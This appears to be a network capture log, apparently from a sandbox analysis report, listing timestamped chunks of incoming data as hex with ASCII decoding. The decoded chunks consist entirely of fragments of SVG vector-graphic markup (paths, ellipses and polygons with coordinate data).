                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1945INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                    Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1961INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                                    Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1977INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                                    Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1993INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2009INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                                    Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2025INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                    Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2041INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                                    Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2057INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                                    Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2073INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                    Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2089INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2105INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2121INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                                    Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2137INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                                    Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2153INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                    Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2169INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                                    Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2185INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                                    Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC2201INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                                    Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
